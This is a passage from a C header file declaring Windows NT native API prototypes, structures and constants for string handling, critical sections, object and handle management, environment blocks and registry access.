 301 | NTSYSAPI
 302 | NTSTATUS
 303 | NTAPI
 304 | RtlUnicodeStringToInteger (
 305 |     IN PUNICODE_STRING String,
 306 |     IN ULONG Base OPTIONAL,
 307 |     OUT PULONG Value
 308 |     );
 309 | 
 310 | 
 311 | NTSYSAPI
 312 | NTSTATUS
 313 | NTAPI
 314 | RtlIntegerToUnicodeString (
 315 |     IN ULONG Value,
 316 |     IN ULONG Base OPTIONAL,
 317 |     IN OUT PUNICODE_STRING String
 318 |     );
 319 | 
 320 | 
 321 | NTSYSAPI
 322 | NTSTATUS
 323 | NTAPI
 324 | RtlGUIDFromString(
 325 |     IN PUNICODE_STRING GuidString,
 326 |     OUT GUID *Guid
 327 |     );
 328 | 
 329 | 
 330 | NTSYSAPI
 331 | LONG
 332 | NTAPI
 333 | RtlCompareUnicodeString (
 334 |     IN PUNICODE_STRING String1,
 335 |     IN PUNICODE_STRING String2,
 336 |     IN BOOLEAN CaseInSensitive
 337 |     );
 338 | 
 339 | 
 340 | NTSYSAPI
 341 | VOID
 342 | NTAPI
 343 | RtlCopyUnicodeString(
 344 |     OUT PUNICODE_STRING DestinationString,
 345 |     IN PUNICODE_STRING SourceString
 346 |     );
 347 | 
 348 | 
 349 | NTSYSAPI
 350 | NTSTATUS
 351 | NTAPI
 352 | RtlUpcaseUnicodeString (
 353 |     OUT PUNICODE_STRING DestinationString,
 354 |     IN PUNICODE_STRING SourceString,
 355 |     IN BOOLEAN AllocateDestinationString
 356 |     );
 357 | 
 358 | 
 359 | NTSYSAPI
 360 | NTSTATUS
 361 | NTAPI
 362 | RtlDowncaseUnicodeString (
 363 |     OUT PUNICODE_STRING DestinationString,
 364 |     IN PUNICODE_STRING SourceString,
 365 |     IN BOOLEAN AllocateDestinationString
 366 |     );
 367 | 
 368 | 
 369 | NTSYSAPI
 370 | BOOLEAN
 371 | NTAPI
 372 | RtlEqualUnicodeString (
 373 |     IN PUNICODE_STRING String1,
 374 |     IN PUNICODE_STRING String2,
 375 |     IN BOOLEAN CaseInSensitive
 376 |     );
 377 | 
 378 | 
 379 | NTSYSAPI
 380 | VOID
 381 | NTAPI
 382 | RtlFreeUnicodeString(
 383 |     IN  PUNICODE_STRING UnicodeString
 384 |     );
 385 | 
 386 | 
 387 | NTSYSAPI
 388 | NTSTATUS
 389 | NTAPI
 390 | RtlAnsiStringToUnicodeString (
 391 |     OUT PUNICODE_STRING DestinationString,
 392 |     IN PANSI_STRING SourceString,
 393 |     IN BOOLEAN AllocateDestinationString
 394 |     );
 395 | 
 396 | 
 397 | NTSYSAPI
 398 | NTSTATUS
 399 | NTAPI
 400 | RtlUnicodeStringToAnsiString (
 401 |     OUT PANSI_STRING DestinationString,
 402 |     IN PUNICODE_STRING SourceString,
 403 |     IN BOOLEAN AllocateDestinationString
 404 |     );
 405 | 
 406 | 
 407 | NTSYSAPI
 408 | VOID
 409 | NTAPI
 410 | RtlInitAnsiString (
 411 |     OUT PANSI_STRING DestinationString,
 412 |     IN PCHAR SourceString
 413 |     );
 414 | 
 415 | 
 416 | NTSYSAPI
 417 | VOID
 418 | NTAPI
 419 | RtlFreeAnsiString (
 420 |     IN PANSI_STRING AnsiString
 421 |     );
 422 | 
 423 | 
 424 | NTSYSAPI
 425 | NTSTATUS
 426 | NTAPI
 427 | RtlFormatCurrentUserKeyPath(
 428 |     OUT PUNICODE_STRING CurrentUserKeyPath
 429 |     );
 430 | 
 431 | 
 432 | NTSYSAPI
 433 | VOID
 434 | NTAPI
 435 | RtlRaiseStatus (
 436 |     IN NTSTATUS Status
 437 |     );
 438 | 
 439 | 
 440 | NTSYSAPI
 441 | VOID
 442 | NTAPI
 443 | DbgBreakPoint(
 444 |     VOID
 445 |     );
 446 | 
 447 | 
 448 | NTSYSAPI
 449 | ULONG
 450 | _cdecl
 451 | DbgPrint (
 452 |     PCH Format,
 453 |     ...
 454 |     );
 455 | 
 456 | 
 457 | NTSYSAPI
 458 | ULONG
 459 | NTAPI
 460 | RtlRandom(
 461 |     IN OUT PULONG Seed
 462 |     );
 463 | 
 464 | //-----------------------------------------------------------------------------
 465 | // Critical section functions
 466 | 
 467 | NTSYSAPI
 468 | NTSTATUS
 469 | NTAPI
 470 | RtlInitializeCriticalSection(
 471 |     IN  PRTL_CRITICAL_SECTION CriticalSection
 472 |     );
 473 | 
 474 | 
 475 | NTSYSAPI
 476 | BOOL
 477 | NTAPI
 478 | RtlTryEnterCriticalSection(
 479 |     IN PRTL_CRITICAL_SECTION CriticalSection
 480 |     );
 481 | 
 482 | 
 483 | NTSYSAPI
 484 | NTSTATUS
 485 | NTAPI
 486 | RtlEnterCriticalSection(
 487 |     IN PRTL_CRITICAL_SECTION CriticalSection
 488 |     );
 489 | 
 490 | 
 491 | NTSYSAPI
 492 | NTSTATUS
 493 | NTAPI
 494 | RtlLeaveCriticalSection(
 495 |     IN PRTL_CRITICAL_SECTION CriticalSection
 496 |     );
 497 | 
 498 | 
 499 | NTSYSAPI
 500 | NTSTATUS
 501 | NTAPI
 502 | RtlDeleteCriticalSection(
 503 |     IN  PRTL_CRITICAL_SECTION CriticalSection
 504 |     );
 505 | 
 506 | //-----------------------------------------------------------------------------
 507 | // Object functions
 508 | 
 509 | //
 510 | // Object Manager Directory Specific Access Rights.
 511 | //
 512 | 
 513 | #ifndef DIRECTORY_QUERY
 514 | #define DIRECTORY_QUERY                 (0x0001)
 515 | #define DIRECTORY_TRAVERSE              (0x0002)
 516 | #define DIRECTORY_CREATE_OBJECT         (0x0004)
 517 | #define DIRECTORY_CREATE_SUBDIRECTORY   (0x0008)
 518 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
 519 | #endif
 520 | 
 521 | typedef enum _POOL_TYPE {
 522 |     NonPagedPool,
 523 |     PagedPool,
 524 |     NonPagedPoolMustSucceed,
 525 |     DontUseThisType,
 526 |     NonPagedPoolCacheAligned,
 527 |     PagedPoolCacheAligned,
 528 |     NonPagedPoolCacheAlignedMustS,
 529 |     MaxPoolType
 530 | } POOL_TYPE;
 531 | 
 532 | 
 533 | //
 534 | // For NtQueryObject
 535 | //
 536 | 
 537 | typedef enum _OBJECT_INFORMATION_CLASS {
 538 |     ObjectBasicInformation,          // = 0
 539 |     ObjectNameInformation,          // = 1
 540 |     ObjectTypeInformation,          // = 2
 541 |     ObjectTypesInformation,         // = 3    //object handle is ignored
 542 |     ObjectHandleFlagInformation     // = 4
 543 | } OBJECT_INFORMATION_CLASS;
 544 | 
 545 | //
 546 | // NtQueryObject uses ObjectBasicInformation
 547 | //
 548 | 
 549 | typedef struct _OBJECT_BASIC_INFORMATION {
 550 |     ULONG Attributes;
 551 |     ACCESS_MASK GrantedAccess;
 552 |     ULONG HandleCount;
 553 |     ULONG PointerCount;
 554 |     ULONG PagedPoolCharge;
 555 |     ULONG NonPagedPoolCharge;
 556 |     ULONG Reserved[3];
 557 |     ULONG NameInfoSize;
 558 |     ULONG TypeInfoSize;
 559 |     ULONG SecurityDescriptorSize;
 560 |     LARGE_INTEGER CreationTime;
 561 | } OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;
 562 | 
 563 | //
 564 | // NtQueryObject uses ObjectNameInformation
 565 | //
 566 | 
 567 | typedef struct _OBJECT_NAME_INFORMATION {
 568 |     UNICODE_STRING Name;
 569 | } OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;
 570 | 
 571 | //
 572 | // NtQueryObject uses ObjectTypeInformation
 573 | //
 574 | 
 575 | typedef struct _OBJECT_TYPE_INFORMATION {
 576 |    UNICODE_STRING TypeName;
 577 |    ULONG TotalNumberOfObjects;
 578 |    ULONG TotalNumberOfHandles;
 579 |    ULONG TotalPagedPoolUsage;
 580 |    ULONG TotalNonPagedPoolUsage;
 581 |    ULONG TotalNamePoolUsage;
 582 |    ULONG TotalHandleTableUsage;
 583 |    ULONG HighWaterNumberOfObjects;
 584 |    ULONG HighWaterNumberOfHandles;
 585 |    ULONG HighWaterPagedPoolUsage;
 586 |    ULONG HighWaterNonPagedPoolUsage;
 587 |    ULONG HighWaterNamePoolUsage;
 588 |    ULONG HighWaterHandleTableUsage;
 589 |    ULONG InvalidAttributes;
 590 |    GENERIC_MAPPING GenericMapping;
 591 |    ULONG ValidAccessMask;
 592 |    BOOLEAN SecurityRequired;
 593 |    BOOLEAN MaintainHandleCount;
 594 |    POOL_TYPE PoolType;
 595 |    ULONG DefaultPagedPoolCharge;
 596 |    ULONG DefaultNonPagedPoolCharge;
 597 | } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;
 598 | 
 599 | //
 600 | // NtQueryObject uses ObjectHandleFlagInformation
 601 | // NtSetInformationObject uses ObjectHandleFlagInformation
 602 | //
 603 | 
 604 | typedef struct _OBJECT_HANDLE_FLAG_INFORMATION {
 605 |     BOOLEAN Inherit;
 606 |     BOOLEAN ProtectFromClose;
 607 | } OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;
 608 | 
 609 | //
 610 | // NtQueryDirectoryObject uses this type
 611 | //
 612 | 
 613 | typedef struct _OBJECT_DIRECTORY_INFORMATION {
 614 |     UNICODE_STRING Name;
 615 |     UNICODE_STRING TypeName;
 616 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
 617 | 
 618 | 
 619 | NTSYSAPI
 620 | NTSTATUS
 621 | NTAPI
 622 | NtOpenDirectoryObject(
 623 |     OUT PHANDLE DirectoryHandle,
 624 |     IN ACCESS_MASK DesiredAccess,
 625 |     IN POBJECT_ATTRIBUTES ObjectAttributes
 626 |     );
 627 | 
 628 | 
 629 | NTSYSAPI
 630 | NTSTATUS
 631 | NTAPI
 632 | NtQueryDirectoryObject(
 633 |     IN HANDLE DirectoryHandle,
 634 |     OUT PVOID Buffer,
 635 |     IN ULONG Length,
 636 |     IN BOOLEAN ReturnSingleEntry,
 637 |     IN BOOLEAN RestartScan,
 638 |     IN OUT PULONG Context,
 639 |     OUT PULONG ReturnLength OPTIONAL
 640 |     );
 641 | 
 642 | 
 643 | NTSYSAPI
 644 | NTSTATUS
 645 | NTAPI
 646 | NtQueryObject (
 647 |     IN HANDLE ObjectHandle,
 648 |     IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
 649 |     OUT PVOID ObjectInformation,
 650 |     IN ULONG Length,
 651 |     OUT PULONG ResultLength OPTIONAL
 652 |     );
 653 | 
 654 | 
 655 | NTSYSAPI
 656 | NTSTATUS
 657 | NTAPI
 658 | NtSetInformationObject (
 659 |     IN HANDLE ObjectHandle,
 660 |     IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
 661 |     IN PVOID ObjectInformation,
 662 |     IN ULONG Length
 663 |     );
 664 | 
 665 | 
 666 | NTSYSAPI
 667 | NTSTATUS
 668 | NTAPI
 669 | NtDuplicateObject (
 670 |     IN HANDLE SourceProcessHandle,
 671 |     IN HANDLE SourceHandle,
 672 |     IN HANDLE TargetProcessHandle OPTIONAL,
 673 |     OUT PHANDLE TargetHandle OPTIONAL,
 674 |     IN ACCESS_MASK DesiredAccess,
 675 |     IN ULONG HandleAttributes,
 676 |     IN ULONG Options
 677 |     );
 678 | 
 679 | 
 680 | NTSYSAPI
 681 | NTSTATUS
 682 | NTAPI
 683 | NtQuerySecurityObject (
 684 |     IN HANDLE ObjectHandle,
 685 |     IN SECURITY_INFORMATION SecurityInformation,
 686 |     OUT PSECURITY_DESCRIPTOR SecurityDescriptor,
 687 |     IN ULONG DescriptorLength,
 688 |     OUT PULONG ReturnLength
 689 |     );
 690 | 
 691 | 
 692 | NTSYSAPI
 693 | NTSTATUS
 694 | NTAPI
 695 | NtSetSecurityObject (
 696 |     IN HANDLE ObjectHandle,
 697 |     IN SECURITY_INFORMATION SecurityInformation,
 698 |     IN PSECURITY_DESCRIPTOR SecurityDescriptor
 699 |     );
 700 | 
 701 | 
 702 | //-----------------------------------------------------------------------------
 703 | // Handle table RTL functions
 704 | 
 705 | #define LEVEL_HANDLE_ID         0x74000000
 706 | #define LEVEL_HANDLE_ID_MASK    0xFF000000
 707 | #define LEVEL_HANDLE_INDEX_MASK 0x00FFFFFF
 708 | 
 709 | typedef enum _RTL_GENERIC_COMPARE_RESULTS {
 710 |     GenericLessThan,
 711 |     GenericGreaterThan,
 712 |     GenericEqual
 713 | } RTL_GENERIC_COMPARE_RESULTS;
 714 | 
 715 | 
 716 | typedef struct _RTL_SPLAY_LINKS
 717 | {
 718 |   struct _RTL_SPLAY_LINKS *Parent;
 719 |   struct _RTL_SPLAY_LINKS *LeftChild;
 720 |   struct _RTL_SPLAY_LINKS *RightChild;
 721 | } RTL_SPLAY_LINKS, *PRTL_SPLAY_LINKS;
 722 | 
 723 | 
 724 | struct _RTL_GENERIC_TABLE;
 725 | 
 726 | typedef
 727 | RTL_GENERIC_COMPARE_RESULTS
 728 | (NTAPI * PRTL_GENERIC_COMPARE_ROUTINE) (
 729 |     struct _RTL_GENERIC_TABLE *Table,
 730 |     PVOID FirstStruct,
 731 |     PVOID SecondStruct
 732 |     );
 733 | 
 734 | typedef
 735 | PVOID
 736 | (NTAPI *PRTL_GENERIC_ALLOCATE_ROUTINE) (
 737 |     struct _RTL_GENERIC_TABLE *Table,
 738 |     ULONG ByteSize
 739 |     );
 740 | 
 741 | typedef
 742 | VOID
 743 | (NTAPI *PRTL_GENERIC_FREE_ROUTINE) (
 744 |     struct _RTL_GENERIC_TABLE *Table,
 745 |     PVOID Buffer
 746 |     );
 747 | 
 748 | 
 749 | typedef struct _RTL_GENERIC_TABLE {
 750 |     PRTL_SPLAY_LINKS TableRoot;
 751 |     LIST_ENTRY InsertOrderList;
 752 |     PLIST_ENTRY OrderedPointer;
 753 |     ULONG WhichOrderedElement;
 754 |     ULONG NumberGenericTableElements;
 755 |     PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine;
 756 |     PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine;
 757 |     PRTL_GENERIC_FREE_ROUTINE FreeRoutine;
 758 |     PVOID TableContext;
 759 | } RTL_GENERIC_TABLE, *PRTL_GENERIC_TABLE;
 760 | 
 761 | 
 762 | typedef struct _RTL_HANDLE_TABLE_ENTRY
 763 | {
 764 |    struct _RTL_HANDLE_TABLE_ENTRY *Next;    /* pointer to next free handle */
 765 |    PVOID  Object;
 766 | 
 767 | } RTL_HANDLE_TABLE_ENTRY, *PRTL_HANDLE_TABLE_ENTRY;
 768 | 
 769 | 
 770 | typedef struct _RTL_HANDLE_TABLE
 771 | {
 772 |    ULONG MaximumNumberOfHandles;
 773 |    ULONG SizeOfHandleTableEntry;
 774 |    ULONG Unknown01;
 775 |    ULONG Unknown02;
 776 |    PRTL_HANDLE_TABLE_ENTRY FreeHandles;
 777 |    PRTL_HANDLE_TABLE_ENTRY CommittedHandles;
 778 |    PRTL_HANDLE_TABLE_ENTRY UnCommittedHandles;
 779 |    PRTL_HANDLE_TABLE_ENTRY MaxReservedHandles;
 780 | } RTL_HANDLE_TABLE, *PRTL_HANDLE_TABLE;
 781 | 
 782 | 
 783 | NTSYSAPI
 784 | VOID
 785 | NTAPI
 786 | RtlInitializeGenericTable (
 787 |     IN PRTL_GENERIC_TABLE Table,
 788 |     IN PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine,
 789 |     IN PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine,
 790 |     IN PRTL_GENERIC_FREE_ROUTINE FreeRoutine,
 791 |     IN PVOID TableContext
 792 |     );
 793 | 
 794 | 
 795 | NTSYSAPI
 796 | VOID
 797 | NTAPI
 798 | RtlInitializeHandleTable(
 799 |     IN ULONG MaximumNumberOfHandles,
 800 |     IN ULONG SizeOfHandleTableEntry,
 801 |     OUT PRTL_HANDLE_TABLE HandleTable
 802 |     );
 803 | 
 804 | 
 805 | NTSYSAPI
 806 | PRTL_HANDLE_TABLE_ENTRY
 807 | NTAPI
 808 | RtlAllocateHandle(
 809 |     IN PRTL_HANDLE_TABLE HandleTable,
 810 |     OUT PULONG HandleIndex OPTIONAL
 811 |     );
 812 | 
 813 | 
 814 | NTSYSAPI
 815 | BOOLEAN
 816 | NTAPI
 817 | RtlFreeHandle(
 818 |     IN PRTL_HANDLE_TABLE HandleTable,
 819 |     IN PRTL_HANDLE_TABLE_ENTRY Handle
 820 |     );
 821 | 
 822 | 
 823 | NTSYSAPI
 824 | BOOLEAN
 825 | NTAPI
 826 | RtlIsValidIndexHandle(
 827 |     IN PRTL_HANDLE_TABLE HandleTable,
 828 |     IN ULONG HandleIndex,
 829 |     OUT PRTL_HANDLE_TABLE_ENTRY *Handle
 830 |     );
 831 | 
 832 | 
 833 | NTSYSAPI
 834 | PVOID
 835 | NTAPI
 836 | RtlInsertElementGenericTable (
 837 |     IN PRTL_GENERIC_TABLE Table,
 838 |     IN PVOID Buffer,
 839 |     IN LONG BufferSize,
 840 |     OUT PBOOLEAN NewElement OPTIONAL
 841 |     );
 842 | 
 843 | 
 844 | NTSYSAPI
 845 | BOOLEAN
 846 | NTAPI
 847 | RtlIsGenericTableEmpty (
 848 |     IN PRTL_GENERIC_TABLE Table
 849 |     );
 850 | 
 851 | 
 852 | NTSYSAPI
 853 | BOOLEAN
 854 | NTAPI
 855 | RtlIsGenericTableEmpty (
 856 |     IN PRTL_GENERIC_TABLE Table
 857 |     );
 858 | 
 859 | 
 860 | NTSYSAPI
 861 | PVOID
 862 | NTAPI
 863 | RtlLookupElementGenericTable (
 864 |     IN PRTL_GENERIC_TABLE Table,
 865 |     IN PVOID Buffer
 866 |     );
 867 | 
 868 | 
 869 | NTSYSAPI
 870 | PVOID
 871 | NTAPI
 872 | RtlEnumerateGenericTableWithoutSplaying(
 873 |     IN  PRTL_GENERIC_TABLE Table,
 874 |     IN  PVOID *RestartKey
 875 |     );
 876 | 
 877 | 
 878 | NTSYSAPI
 879 | NTSTATUS
 880 | NTAPI
 881 | NtClose(
 882 |     IN  HANDLE Handle
 883 |     );
 884 | 
 885 | 
 886 | NTSYSAPI
 887 | NTSTATUS
 888 | NTAPI
 889 | ZwClose(
 890 |     IN  HANDLE Handle
 891 |     );
 892 | 
 893 | //-----------------------------------------------------------------------------
 894 | // Environment functions
 895 | 
 896 | NTSYSAPI
 897 | NTSTATUS
 898 | NTAPI
 899 | RtlOpenCurrentUser(
 900 |     IN ULONG DesiredAccess,
 901 |     OUT PHANDLE CurrentUserKey
 902 |     );
 903 | 
 904 | 
 905 | NTSYSAPI
 906 | NTSTATUS
 907 | NTAPI
 908 | RtlCreateEnvironment(
 909 |     BOOLEAN CloneCurrentEnvironment,
 910 |     PVOID *Environment
 911 |     );
 912 | 
 913 | 
 914 | NTSYSAPI
 915 | NTSTATUS
 916 | NTAPI
 917 | RtlQueryEnvironmentVariable_U (
 918 |     PVOID Environment,
 919 |     PUNICODE_STRING Name,
 920 |     PUNICODE_STRING Value
 921 |     );
 922 | 
 923 | 
 924 | NTSYSAPI
 925 | NTSTATUS
 926 | NTAPI
 927 | RtlSetEnvironmentVariable(
 928 |     PVOID *Environment,
 929 |     PUNICODE_STRING Name,
 930 |     PUNICODE_STRING Value
 931 |     );
 932 | 
 933 | 
 934 | NTSYSAPI
 935 | NTSTATUS
 936 | NTAPI
 937 | RtlDestroyEnvironment(
 938 |     PVOID Environment
 939 |     );
 940 | 
 941 | //-----------------------------------------------------------------------------
 942 | // Registry functions
 943 | 
 944 | 
 945 | typedef enum _KEY_INFORMATION_CLASS
 946 | {
 947 |     KeyBasicInformation,
 948 |     KeyNodeInformation,
 949 |     KeyFullInformation,
 950 |     KeyNameInformation,
 951 |     KeyCachedInformation,
 952 |     KeyFlagsInformation,
 953 |     MaxKeyInfoClass  // MaxKeyInfoClass should always be the last enum
 954 | 
 955 | } KEY_INFORMATION_CLASS;
 956 | 
 957 | //
 958 | // Key query structures
 959 | //
 960 | 
 961 | typedef struct _KEY_BASIC_INFORMATION
 962 | {
 963 |     LARGE_INTEGER LastWriteTime;
 964 |     ULONG   TitleIndex;
 965 |     ULONG   NameLength;
 966 |     WCHAR   Name[1];            // Variable length string
 967 | 
 968 | } KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;
 969 | 
 970 | 
 971 | typedef struct _KEY_NODE_INFORMATION
 972 | {
 973 |     LARGE_INTEGER LastWriteTime;
 974 |     ULONG   TitleIndex;
 975 |     ULONG   ClassOffset;
 976 |     ULONG   ClassLength;
 977 |     ULONG   NameLength;
 978 |     WCHAR   Name[1];            // Variable length string
 979 | //          Class[1];           // Variable length string not declared
 980 | } KEY_NODE_INFORMATION, *PKEY_NODE_INFORMATION;
 981 | 
 982 | 
 983 | typedef struct _KEY_FULL_INFORMATION
 984 | {
 985 |     LARGE_INTEGER LastWriteTime;
 986 |     ULONG   TitleIndex;
 987 |     ULONG   ClassOffset;
 988 |     ULONG   ClassLength;
 989 |     ULONG   SubKeys;
 990 |     ULONG   MaxNameLen;
 991 |     ULONG   MaxClassLen;
 992 |     ULONG   Values;
 993 |     ULONG   MaxValueNameLen;
 994 |     ULONG   MaxValueDataLen;
 995 |     WCHAR   Class[1];           // Variable length
 996 | 
 997 | } KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;
 998 | 
 999 | 
1000 | // end_wdm
1001 | typedef struct _KEY_NAME_INFORMATION
1002 | {
1003 |     ULONG   NameLength;
1004 |     WCHAR   Name[1];            // Variable length string
1005 | 
1006 | } KEY_NAME_INFORMATION, *PKEY_NAME_INFORMATION;
1007 | 
1008 | typedef struct _KEY_CACHED_INFORMATION
1009 | {
1010 |     LARGE_INTEGER LastWriteTime;
1011 |     ULONG   TitleIndex;
1012 |     ULONG   SubKeys;
1013 |     ULONG   MaxNameLen;
1014 |     ULONG   Values;
1015 |     ULONG   MaxValueNameLen;
1016 |     ULONG   MaxValueDataLen;
1017 |     ULONG   NameLength;
1018 |     WCHAR   Name[1];            // Variable length string
1019 | 
1020 | } KEY_CACHED_INFORMATION, *PKEY_CACHED_INFORMATION;
1021 | 
1022 | 
1023 | typedef struct _KEY_FLAGS_INFORMATION
1024 | {
1025 |     ULONG   UserFlags;
1026 | 
1027 | } KEY_FLAGS_INFORMATION, *PKEY_FLAGS_INFORMATION;
1028 | 
1029 | 
1030 | 
1031 | typedef enum _KEY_VALUE_INFORMATION_CLASS {
1032 |     KeyValueBasicInformation,
1033 |     KeyValueFullInformation,
1034 |     KeyValuePartialInformation,
1035 |     KeyValueFullInformationAlign64,
1036 |     KeyValuePartialInformationAlign64,
1037 |     MaxKeyValueInfoClass  // MaxKeyValueInfoClass should always be the last enum
1038 | } KEY_VALUE_INFORMATION_CLASS;
1039 | 
1040 | 
1041 | typedef struct _KEY_VALUE_FULL_INFORMATION {
1042 |     ULONG   TitleIndex;
1043 |     ULONG   Type;
1044 |     ULONG   DataOffset;
1045 |     ULONG   DataLength;
1046 |     ULONG   NameLength;
1047 |     WCHAR   Name[1];            // Variable size
1048 | //          Data[1];            // Variable size data not declared
1049 | } KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;
1050 | 
1051 | 
1052 | typedef struct _KEY_VALUE_PARTIAL_INFORMATION {
1053 |     ULONG   TitleIndex;
1054 |     ULONG   Type;
1055 |     ULONG   DataLength;
1056 |     UCHAR   Data[1];            // Variable size
1057 | } KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;
1058 | 
1059 | 
1060 | 
1061 | NTSYSAPI
1062 | NTSTATUS
1063 | NTAPI
1064 | NtCreateKey(
1065 |     OUT PHANDLE KeyHandle,
1066 |     IN  ACCESS_MASK DesiredAccess,
1067 |     IN  POBJECT_ATTRIBUTES ObjectAttributes,
1068 |     IN  ULONG TitleIndex,
1069 |     IN  PUNICODE_STRING Class OPTIONAL,
1070 |     IN  ULONG CreateOptions,
1071 |     OUT PULONG Disposition OPTIONAL
1072 |     );
1073 | 
1074 | 
1075 | NTSYSAPI
1076 | NTSTATUS
1077 | NTAPI
1078 | NtOpenKey(
1079 |     OUT PHANDLE KeyHandle,
1080 |     IN ACCESS_MASK DesiredAccess,
1081 |     IN POBJECT_ATTRIBUTES ObjectAttributes
1082 |     );
1083 | 
1084 | NTSYSAPI
1085 | NTSTATUS
1086 | NTAPI
1087 | NtQueryKey(
1088 |            IN HANDLE  KeyHandle,
1089 |            IN KEY_INFORMATION_CLASS  KeyInformationClass,
1090 |            OUT PVOID  KeyInformation,
1091 |            IN ULONG  Length,
1092 |            OUT PULONG  ResultLength
1093 |     );
1094 | 
1095 | NTSYSAPI
1096 | NTSTATUS
1097 | NTAPI
1098 | NtEnumerateKey(
1099 |     IN HANDLE KeyHandle,
1100 |     IN ULONG Index,
1101 |     IN KEY_INFORMATION_CLASS KeyInformationClass,
1102 |     IN PVOID KeyInformation,
1103 |     IN ULONG Length,
1104 |     IN PULONG ResultLength
1105 |     );
1106 | 
1107 | 
1108 | NTSYSAPI
1109 | NTSTATUS
1110 | NTAPI
1111 | NtDeleteKey(
1112 |     IN HANDLE KeyHandle
1113 |     );
1114 | 
1115 | 
1116 | NTSYSAPI
1117 | NTSTATUS
1118 | NTAPI
1119 | NtQueryValueKey(
1120 |     IN HANDLE KeyHandle,
1121 |     IN PUNICODE_STRING ValueName,
1122 |     IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
1123 |     OUT PVOID KeyValueInformation,
1124 |     IN ULONG Length,
1125 |     OUT PULONG ResultLength
1126 |     );
1127 | 
1128 | 
1129 | NTSYSAPI
1130 | NTSTATUS
1131 | NTAPI
1132 | NtSetValueKey(
1133 |     IN HANDLE KeyHandle,
1134 |     IN PUNICODE_STRING ValueName,
1135 |     IN ULONG TitleIndex OPTIONAL,
1136 |     IN ULONG Type,
1137 |     IN PVOID Data,
1138 |     IN ULONG DataSize
1139 |     );
1140 | 
1141 | 
1142 | NTSYSAPI
1143 | NTSTATUS
1144 | NTAPI
1145 | NtDeleteValueKey(
1146 |     IN HANDLE KeyHandle,
1147 |     IN PUNICODE_STRING ValueName
1148 |     );
1149 | 
1150 | //-----------------------------------------------------------------------------
1151 | // RtlQueryRegistryValues
1152 | 
1153 | //
1154 | // The following flags specify how the Name field of a RTL_QUERY_REGISTRY_TABLE
1155 | // entry is interpreted.  A NULL name indicates the end of the table.
1156 | //
1157 | 
1158 | #define RTL_QUERY_REGISTRY_SUBKEY   0x00000001  // Name is a subkey and remainder of
1159 |                                                 // table or until next subkey are value
1160 |                                                 // names for that subkey to look at.
1161 | 
1162 | #define RTL_QUERY_REGISTRY_TOPKEY   0x00000002  // Reset current key to original key for
1163 |                                                 // this and all following table entries.
1164 | 
1165 | #define RTL_QUERY_REGISTRY_REQUIRED 0x00000004  // Fail if no match found for this table
1166 |                                                 // entry.
1167 | 
1168 | #define RTL_QUERY_REGISTRY_NOVALUE  0x00000008  // Used to mark a table entry that has no
1169 |                                                 // value name, just wants a call out, not
1170 |                                                 // an enumeration of all values.
1171 | 
1172 | #define RTL_QUERY_REGISTRY_NOEXPAND 0x00000010  // Used to suppress the expansion of
1173 |                                                 // REG_MULTI_SZ into multiple callouts or
1174 |                                                 // to prevent the expansion of environment
1175 |                                                 // variable values in REG_EXPAND_SZ
1176 | 
1177 | #define RTL_QUERY_REGISTRY_DIRECT   0x00000020  // QueryRoutine field ignored.  EntryContext
1178 |                                                 // field points to location to store value.
1179 |                                                 // For null terminated strings, EntryContext
1180 |                                                 // points to UNICODE_STRING structure that
1181 |                                                 // that describes maximum size of buffer.
1182 |                                                 // If .Buffer field is NULL then a buffer is
1183 |                                                 // allocated.
1184 |                                                 //
1185 | 
1186 | #define RTL_QUERY_REGISTRY_DELETE   0x00000040  // Used to delete value keys after they
1187 |                                                 // are queried.
1188 | 
1189 | 
1190 | //
1191 | // The following values for the RelativeTo parameter determine what the
1192 | // Path parameter to RtlQueryRegistryValues is relative to.
1193 | //
1194 | 
1195 | #define RTL_REGISTRY_ABSOLUTE     0             // Path is a full path
1196 | #define RTL_REGISTRY_SERVICES     1             // \Registry\Machine\System\CurrentControlSet\Services
1197 | #define RTL_REGISTRY_CONTROL      2             // \Registry\Machine\System\CurrentControlSet\Control
1198 | #define RTL_REGISTRY_WINDOWS_NT   3             // \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion
1199 | #define RTL_REGISTRY_DEVICEMAP    4             // \Registry\Machine\Hardware\DeviceMap
1200 | #define RTL_REGISTRY_USER         5             // \Registry\User\CurrentUser
1201 | #define RTL_REGISTRY_MAXIMUM      6
1202 | #define RTL_REGISTRY_HANDLE       0x40000000    // Low order bits are registry handle
1203 | #define RTL_REGISTRY_OPTIONAL     0x80000000    // Indicates the key node is optional
1204 | 
1205 | 
1206 | typedef NTSTATUS (NTAPI * PRTL_QUERY_REGISTRY_ROUTINE)(
1207 |     IN PWSTR ValueName,
1208 |     IN ULONG ValueType,
1209 |     IN PVOID ValueData,
1210 |     IN ULONG ValueLength,
1211 |     IN PVOID Context,
1212 |     IN PVOID EntryContext
1213 |     );
1214 | 
1215 | typedef struct _RTL_QUERY_REGISTRY_TABLE
1216 | {
1217 |     PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine;
1218 |     ULONG Flags;
1219 |     PWSTR Name;
1220 |     PVOID EntryContext;
1221 |     ULONG DefaultType;
1222 |     PVOID DefaultData;
1223 |     ULONG DefaultLength;
1224 | 
1225 | } RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE;
1226 | 
1227 | 
1228 | NTSYSAPI
1229 | NTSTATUS
1230 | NTAPI
1231 | RtlQueryRegistryValues(
1232 |     IN ULONG  RelativeTo,
1233 |     IN PCWSTR  Path,
